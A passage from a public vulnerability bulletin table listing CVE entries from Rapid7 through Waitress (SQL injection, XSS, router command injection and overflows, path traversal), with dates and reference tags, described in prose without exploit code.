Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80. | 2022-03-17 | not yet calculated | CVE-2022-0237 CONFIRM MISC |
| rapid7 — nexpose |
Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the “ANY” and “OR” operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129. | 2022-03-17 | not yet calculated | CVE-2022-0757 CONFIRM |
| rapid7 — nexpose |
Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130. | 2022-03-17 | not yet calculated | CVE-2022-0758 CONFIRM |
| responsive_menu — responsive_menu |
Nonce token leak vulnerability leading to arbitrary file upload, theme deletion, plugin settings change discovered in Responsive Menu WordPress plugin (versions <= 4.1.7). | 2022-03-18 | not yet calculated | CVE-2022-25602 CONFIRM CONFIRM |
| rockwell_automation — isagraf_runtime | Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the tiny encryption algorithm (TEA) on an entered or saved password. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device. | 2022-03-18 | not yet calculated | CVE-2020-25180 CONFIRM CONFIRM CONFIRM CONFIRM |
| rockwell_automation — isagraf_runtime | Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x stores the password in plaintext in a file that is in the same directory as the executable file. ISaGRAF Runtime reads the file and saves the data in a variable without any additional modification. A local, unauthenticated attacker could compromise the user passwords, resulting in information disclosure. | 2022-03-18 | not yet calculated | CVE-2020-25184 CONFIRM CONFIRM CONFIRM CONFIRM |
| rockwell_automation — isagraf_runtime | Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems. | 2022-03-18 | not yet calculated | CVE-2020-25182 CONFIRM CONFIRM CONFIRM CONFIRM |
| rockwell_automation — isagraf_runtime | ISaGRAF Workbench communicates with Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x using TCP/IP. This communication protocol provides various file system operations, as well as the uploading of applications. Data is transferred over this protocol unencrypted, which could allow a remote unauthenticated attacker to upload, read, and delete files. | 2022-03-18 | not yet calculated | CVE-2020-25178 CONFIRM CONFIRM CONFIRM CONFIRM |
| rockwell_automation — isagraf_runtime |
Some commands used by the Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x eXchange Layer (IXL) protocol perform various file operations in the file system. Since the parameter pointing to the file name is not checked for reserved characters, it is possible for a remote, unauthenticated attacker to traverse an application’s directory, which could lead to remote code execution. | 2022-03-18 | not yet calculated | CVE-2020-25176 CONFIRM CONFIRM CONFIRM CONFIRM |
| runasspc — runasspc |
RunAsSpc 4.0 uses a universal and recoverable encryption key. In possession of a file encrypted by RunAsSpc, an attacker can recover the credentials that were used. | 2022-03-16 | not yet calculated | CVE-2022-26660 MISC |
| sailsjs — sail.js |
SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules(). | 2022-03-17 | not yet calculated | CVE-2021-44908 MISC MISC MISC |
| samba — samba | Kerberos acceptors need easy access to stable AD identifiers (eg objectSid). Samba as an AD DC now provides a way for Linux applications to obtain a reliable SID (and samAccountName) in issued tickets. | 2022-03-16 | not yet calculated | CVE-2020-25721 MISC MISC MISC |
| secure_mobile_access — 100_series_products |
** UNSUPPORTED WHEN ASSIGNED ** Improper neutralization of Special Elements leading to OS Command Injection vulnerability impacting end-of-life Secure Remote Access (SRA) products and older firmware versions of Secure Mobile Access (SMA) 100 series products, specifically the SRA appliances running all 8.x, 9.0.0.5-19sv and earlier versions and Secure Mobile Access (SMA) 100 series products running older firmware 9.0.0.9-26sv and earlier versions. | 2022-03-17 | not yet calculated | CVE-2022-22273 CONFIRM |
| seo_301_meta — seo_301_meta |
The SEO 301 Meta WordPress plugin through 1.9.1 does not escape its Request and Destination settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0701 MISC |
| simple_quotation — simple_quotation | The Simple Quotation WordPress plugin through 1.3.2 does not have authorisation (and CSRF) checks in various of its AJAX actions and is lacking escaping of user data when using it in SQL statements, allowing any authenticated users, such as subscriber to perform SQL injection attacks | 2022-03-14 | not yet calculated | CVE-2022-22735 MISC |
| simple_quotation — simple_quotation |
The Simple Quotation WordPress plugin through 1.3.2 does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them | 2022-03-14 | not yet calculated | CVE-2022-22734 MISC |
| simple_tracking — simple_tracking |
The Simple Tracking WordPress plugin before 1.7 does not sanitise and escape its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0700 MISC |
| singoocms — singoocms |
This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter. | 2022-03-17 | not yet calculated | CVE-2022-0749 MISC MISC MISC |
| slims8 — akasia |
Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users. | 2022-03-17 | not yet calculated | CVE-2021-45791 MISC |
| slims9 — bulian | Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained. | 2022-03-17 | not yet calculated | CVE-2021-45794 MISC |
| slims9 — bulian | Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained. | 2022-03-17 | not yet calculated | CVE-2021-45793 MISC |
| slims9 — bulian |
Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php. | 2022-03-17 | not yet calculated | CVE-2021-45792 MISC |
| snapcenter — snapcenter |
SnapCenter versions prior to 4.5 are susceptible to a vulnerability which could allow a local authenticated attacker to discover plaintext HANA credentials. | 2022-03-16 | not yet calculated | CVE-2022-23234 MISC |
| sonatype — nexus_repository_manager |
Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection. | 2022-03-17 | not yet calculated | CVE-2021-43961 MISC MISC |
| sourcecodester — attendance_and_payroll_system |
An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters. | 2022-03-17 | not yet calculated | CVE-2021-44088 MISC MISC MISC |
| spatie — media-library-pro_library |
The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route. | 2022-03-17 | not yet calculated | CVE-2021-45040 MISC MISC |
| sqlpad — sqlpad |
Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1. | 2022-03-15 | not yet calculated | CVE-2022-0944 CONFIRM MISC |
| star7th — showdoc | Unrestricted Upload of File with Dangerous Type in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0950 CONFIRM MISC |
| star7th — showdoc | Stored XSS viva .webmv file upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0964 MISC CONFIRM |
| star7th — showdoc | Stored XSS via File Upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0957 CONFIRM MISC |
| star7th — showdoc | Stored XSS via File Upload in GitHub repository star7th/showdoc prior to v.2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0956 MISC CONFIRM |
| star7th — showdoc | Stored XSS via File Upload in star7th/showdoc in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0967 MISC CONFIRM |
| star7th — showdoc | Stored XSS viva .ofd file upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0965 MISC CONFIRM |
| star7th — showdoc | File Upload Restriction Bypass leading to Stored XSS Vulnerability in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0951 MISC CONFIRM |
| star7th — showdoc | Stored XSS viva axd and cshtml file upload in star7th/showdoc in GitHub repository star7th/showdoc prior to v2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0945 CONFIRM MISC |
| star7th — showdoc | Stored XSS viva .properties file upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-14 | not yet calculated | CVE-2022-0960 CONFIRM MISC |
| star7th — showdoc | Stored XSS via File Upload in star7th/showdoc in GitHub repository star7th/showdoc prior to 2.4.10. | 2022-03-15 | not yet calculated | CVE-2022-0966 MISC CONFIRM |
| star7th — showdoc |
Stored XSS viva .webma file upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-14 | not yet calculated | CVE-2022-0962 MISC CONFIRM |
| star7th — showdoc |
Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to 2.10.4. | 2022-03-15 | not yet calculated | CVE-2022-0942 MISC CONFIRM |
| stb_trutype.h — stb_trutype.h | stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function stbtt__find_table at stb_truetype.h. | 2022-03-17 | not yet calculated | CVE-2022-25516 MISC |
| stb_trutype.h — stb_trutype.h | stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttULONG() at stb_truetype.h. | 2022-03-17 | not yet calculated | CVE-2022-25515 MISC |
| stb_trutype.h — stb_trutype.h |
stb_truetype.h v1.26 was discovered to contain a heap-buffer-overflow via the function ttUSHORT() at stb_truetype.h. | 2022-03-17 | not yet calculated | CVE-2022-25514 MISC |
| stormshield — network_security |
In Stormshield Network Security (SNS) before 3.7.25, 3.8.x through 3.11.x before 3.11.13, 4.x before 4.2.10, and 4.3.x before 4.3.5, a flood of connections to the SSLVPN service might lead to saturation of the loopback interface. This could result in the blocking of almost all network traffic, making the firewall unreachable. An attacker could exploit this via forged and properly timed traffic to cause a denial of service. | 2022-03-15 | not yet calculated | CVE-2022-23989 MISC |
| suse — linux_enterprise_server |
A Insecure Temporary File vulnerability in grub-once of grub2 in SUSE Linux Enterprise Server 15 SP4, openSUSE Factory allows local attackers to truncate arbitrary files. This issue affects: SUSE Linux Enterprise Server 15 SP4 grub2 versions prior to 2.06-150400.7.1. SUSE openSUSE Factory grub2 versions prior to 2.06-18.1. | 2022-03-16 | not yet calculated | CVE-2021-46705 CONFIRM |
| sylius — sylius | Sylius is an open source eCommerce platform. Prior to versions 1.10.11 and 1.11.2, the reset password token was not set to null after the password was changed. The same token could be used several times, which could result in leak of the existing token and unauthorized password change. The issue is fixed in versions 1.10.11 and 1.11.2. As a workaround, overwrite the `SyliusBundleApiBundleCommandHandlerResetPasswordHandler` class with code provided by the maintainers and register it in a container. More information about this workaround is available in the GitHub Security Advisory. | 2022-03-14 | not yet calculated | CVE-2022-24743 MISC CONFIRM MISC |
| sylius — sylius | Sylius is an open source eCommerce platform. In versions prior to 1.9.10, 1.10.11, and 1.11.2, it is possible to upload an SVG file containing cross-site scripting (XSS) code in the admin panel. In order to perform a XSS attack, the file itself has to be open in a new card or loaded outside of the IMG tag. The problem applies both to the files opened on the admin panel and shop pages. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. As a workaround, require a library that adds on-upload file sanitization and overwrite the service before writing the file to the filesystem. The GitHub Security Advisory contains more specific information about the workaround. | 2022-03-14 | not yet calculated | CVE-2022-24749 CONFIRM MISC MISC MISC |
| sylius — sylius |
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, it is possible for a page controlled by an attacker to load the website within an iframe. This will enable a clickjacking attack, in which the attacker’s page overlays the target application’s interface with a different interface provided by the attacker. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. Every response from app should have an X-Frame-Options header set to: “sameorigin“. To achieve that, add a new `subscriber` in the app. | 2022-03-14 | not yet calculated | CVE-2022-24733 CONFIRM MISC MISC MISC |
| sylius — sylius |
Sylius is an open source eCommerce platform. Prior to versions 1.9.10, 1.10.11, and 1.11.2, any other user can view the data if browser tab remains unclosed after log out. The issue is fixed in versions 1.9.10, 1.10.11, and 1.11.2. A workaround is available. The application must strictly redirect to login page even browser back button is pressed. Another possibility is to set more strict cache policies for restricted content. | 2022-03-14 | not yet calculated | CVE-2022-24742 MISC CONFIRM MISC MISC |
| sylius — sylius |
SyliusGridBundle is a package of generic data grids for Symfony applications. Prior to versions 1.10.1 and 1.11-rc2, values added at the end of query sorting were passed directly to the database. The maintainers do not know if this could lead to direct SQL injections but took steps to remediate the vulnerability. The issue is fixed in versions 1.10.1 and 1.11-rc2. As a workaround, overwrite the`SyliusComponentGridSortingSorter.php` class and register it in the container. More information about this workaround is available in the GitHub Security Advisory. | 2022-03-15 | not yet calculated | CVE-2022-24752 MISC CONFIRM MISC MISC MISC |
| syltek — syltek |
Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification. | 2022-03-18 | not yet calculated | CVE-2021-4031 CONFIRM |
| sync_qcloud_cos — sync_qcloud_cos |
The Sync QCloud COS WordPress plugin before 2.0.1 does not escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0659 MISC |
| sysend.js — sysend.js |
sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages. | 2022-03-14 | not yet calculated | CVE-2022-24762 CONFIRM MISC MISC MISC |
| taocms — taocms |
taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file. | 2022-03-18 | not yet calculated | CVE-2022-25578 MISC MISC |
| team_circle_image_slider_with_lightbox — team_circle_image_slider_with_lightbox |
The Team Circle Image Slider With Lightbox WordPress plugin before 1.0.16 does not sanitize and escape the order_pos parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. | 2022-03-14 | not yet calculated | CVE-2022-0648 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function. | 2022-03-18 | not yet calculated | CVE-2022-25428 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. | 2022-03-18 | not yet calculated | CVE-2022-25427 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function. | 2022-03-18 | not yet calculated | CVE-2022-25429 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function. | 2022-03-18 | not yet calculated | CVE-2022-25431 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the urls parameter in the saveparentcontrolinfo function. | 2022-03-18 | not yet calculated | CVE-2022-25433 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the firewallen parameter in the SetFirewallCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25434 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25437 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetStaticRoutecfg function. | 2022-03-18 | not yet calculated | CVE-2022-25435 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the SetIPTVCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25438 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. | 2022-03-18 | not yet calculated | CVE-2022-25455 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedstarttime parameter in the openSchedWifi function. | 2022-03-18 | not yet calculated | CVE-2022-25446 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the day parameter in the openSchedWifi function. | 2022-03-18 | not yet calculated | CVE-2022-25448 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function. | 2022-03-18 | not yet calculated | CVE-2022-25449 MISC |
| tenda — routers | Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetVirtualServerCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25450 MISC |
| tenda — routers | Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function. | 2022-03-18 | not yet calculated | CVE-2022-25451 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function. | 2022-03-18 | not yet calculated | CVE-2022-25452 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function. | 2022-03-18 | not yet calculated | CVE-2022-25453 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25454 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function. | 2022-03-18 | not yet calculated | CVE-2022-25456 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function. | 2022-03-18 | not yet calculated | CVE-2022-25439 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function. | 2022-03-18 | not yet calculated | CVE-2022-25445 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25457 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function. | 2022-03-18 | not yet calculated | CVE-2022-25458 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25459 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the endip parameter in the SetPptpServerCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25460 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25441 MISC |
| tenda — routers | Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25440 MISC |
| tenda — routers | Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function. | 2022-03-18 | not yet calculated | CVE-2022-25447 MISC |
| tenda — routers |
Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function. | 2022-03-18 | not yet calculated | CVE-2022-25461 MISC |
| tibco — multiple_products |
The Server component of TIBCO Software Inc.’s TIBCO JasperReports Library, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, TIBCO JasperReports Server for ActiveMatrix BPM, and TIBCO JasperReports Server for Microsoft Azure contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system. Affected releases are TIBCO Software Inc.’s TIBCO JasperReports Library: version 7.9.0, TIBCO JasperReports Library for ActiveMatrix BPM: version 7.9.0, TIBCO JasperReports Server: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for AWS Marketplace: versions 7.9.0 and 7.9.1, TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.9.0 and 7.9.1, and TIBCO JasperReports Server for Microsoft Azure: version 7.9.1. | 2022-03-15 | not yet calculated | CVE-2022-22771 CONFIRM CONFIRM |
| tiny_file_manager — tiny_file_manager |
A path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager before 2.4.7 allows remote attackers (with valid user accounts) to upload malicious PHP files to the webroot, leading to code execution. | 2022-03-15 | not yet calculated | CVE-2021-45010 MISC MISC MISC MISC MISC MISC MISC MISC |
| tinyfilemanager — tinyfilemanager |
Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7. | 2022-03-17 | not yet calculated | CVE-2022-1000 MISC CONFIRM |
| totlink — routers |
Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function NTPSyncWithHost. This vulnerability allows attackers to execute arbitrary commands via the host_time parameter. | 2022-03-15 | not yet calculated | CVE-2022-26214 MISC |
| totolink — firmware |
Totolink X5000R_Firmware v9.1.0u.6118_B20201102 was discovered to contain a command injection vulnerability in the function setNtpCfg, via the tz parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26213 MISC |
| totolink — routers | Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUploadSetting, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26209 MISC |
| totolink — routers | Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDiagnosisCfg, via the ipDoamin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26207 MISC |
| totolink — routers | Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6rd function via the relay6rd parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-27003 MISC |
| totolink — routers | Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the Tunnel 6in4 function via the remote6in4 parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-27004 MISC |
| totolink — routers | Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function CloudACMunualUpdate, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26211 MISC |
| totolink — routers | Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setLanguageCfg, via the langType parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26206 MISC |
| totolink — routers | Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setWebWlanIdx, via the webWlanIdx parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26208 MISC |
| totolink — routers | Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setUpgradeFW, via the FileName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26210 MISC |
| totolink — routers |
Totolink routers s X5000R V9.1.0u.6118_B20201102 and A7000R V9.1.0u.6115_B20201022 were discovered to contain a command injection vulnerability in the setWanCfg function via the hostName parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-27005 MISC |
| totolink — routers |
Totolink A830R V5.9c.4729_B20191112, A3100R V4.1.2cu.5050_B20200504, A950RG V4.1.2cu.5161_B20200903, A800R V4.1.2cu.5137_B20200730, A3000RU V5.9c.5185_B20201128, and A810R V4.1.2cu.5182_B20201026 were discovered to contain a command injection vulnerability in the function setDeviceName, via the deviceMac and deviceName parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26212 MISC |
| unisoc — chipset |
The UNISOC chipset through 2022-03-15 allows attackers to obtain remote control of a mobile phone, e.g., to obtain sensitive information from text messages or the device’s screen, record video of the device’s physical environment, or modify data. | 2022-03-18 | not yet calculated | CVE-2022-27250 MISC |
| veeam — agent_for_windows |
Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges. | 2022-03-17 | not yet calculated | CVE-2022-26503 MISC MISC |
| veeam — backup_and_replication | **REJECT** Veeam Backup & Replication 10.x and 11.x has an Untrusted Search Path. | 2022-03-18 | not yet calculated | CVE-2022-26502 |
| veeam — backup_and_replication | Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2). | 2022-03-17 | not yet calculated | CVE-2022-26501 MISC MISC |
| veeam — backup_and_replication | Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code. | 2022-03-17 | not yet calculated | CVE-2022-26500 MISC MISC |
| veeam — backup_and_replication |
Improper authentication in Veeam Backup & Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe | 2022-03-17 | not yet calculated | CVE-2022-26504 MISC MISC |
| vim — vim |
Heap-based Buffer Overflow occurs in vim in GitHub repository vim/vim prior to 8.2.4563. | 2022-03-14 | not yet calculated | CVE-2022-0943 MISC CONFIRM |
| volto — volto |
Volto is a ReactJS-based frontend for the Plone Content Management System. Between versions 14.0.0-alpha.5 and 15.0.0-alpha.0, a user could have their authentication cookie replaced with an authentication cookie from another user, effectively giving them control of the other user’s account and privileges. This occurs when using an outdated version of the `react-cookie` library and a server is under high load. A proof of concept does not currently exist, but it is possible for this issue to occur in the wild. The patch and fix is present in Volto 15.0.0-alpha.0. As a workaround, one may manually upgrade the `react-cookie` package to 4.1.1 and then override all Volto components that use this library. | 2022-03-14 | not yet calculated | CVE-2022-24740 CONFIRM MISC |
| voting_contest — voting_contest |
The WP Voting Contest WordPress plugin through 2.1 does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue | 2022-03-14 | not yet calculated | CVE-2022-0321 MISC |
| waitress — waitress |
Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python’s `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress 